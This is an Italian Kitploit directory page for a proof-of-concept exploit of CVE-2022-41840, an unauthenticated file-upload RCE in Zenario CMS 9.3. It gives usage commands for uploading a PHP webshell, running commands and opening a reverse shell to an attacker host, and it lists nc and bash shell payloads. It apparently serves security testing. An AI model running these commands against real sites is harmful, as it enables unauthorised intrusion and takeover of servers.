Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-41840-PoC — Questo è l'exploit PoC per CVE-2022-41840, che colpisce Zenario | Kitploit
Strumenti/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

Questo è l'exploit PoC per CVE-2022-41840, che colpisce Zenario

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 mesi faNon ancora revisionato

Zenario CMS 9.3 - Exploit RCE non autenticato

CVE-2022-41840

Una vulnerabilità di esecuzione remota di codice (RCE) non autenticata che affligge Zenario CMS versione 9.3 e precedenti. L'exploit sfrutta una vulnerabilità di upload di file nell'endpoint AJAX per caricare una webshell PHP e ottenere l'esecuzione di codice.

Dettagli della Vulnerabilità

  • CVE: CVE-2022-41840
  • Versione Affetta: Zenario CMS <= 9.3
  • Tipo di Vulnerabilità: Upload di file non autenticato che porta a RCE
  • Vettore di Attacco: HTTP POST verso /zenario/ajax.php
  • Privilegi Richiesti: Nessuno (non autenticato)

Utilizzo

Webshell Interattiva

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

Esecuzione di un Singolo Comando

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

Reverse Shell

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

Requisiti

  • Python 3.x
  • libreria requests

Installa le dipendenze:

root@kitploit:~
pip install requests

Funzionalità

  • Caricamento automatico di webshell PHP tramite endpoint AJAX vulnerabile
  • Supporto per più valori di instanceId per aumentare il tasso di successo
  • Estrazione del percorso basata su JSON ed espressioni regolari
  • Molteplici opzioni di payload per reverse shell (bash, python, perl, nc)
  • Shell PTY completamente interattiva con supporto terminale
  • Fallback alla webshell se la reverse shell fallisce

Disclaimer

Solo per scopi educativi e di test di sicurezza autorizzati.

Questo strumento è fornito a ricercatori di sicurezza e penetration tester per testare sistemi di loro proprietà o per i quali dispongono di esplicita autorizzazione. L'accesso non autorizzato a sistemi informatici è illegale e severamente vietato.

I manutentori non si assumono alcuna responsabilità per usi impropri o danni causati da questo strumento.

Licenza

Questo codice è fornito per scopi educativi.

Scarica lo strumento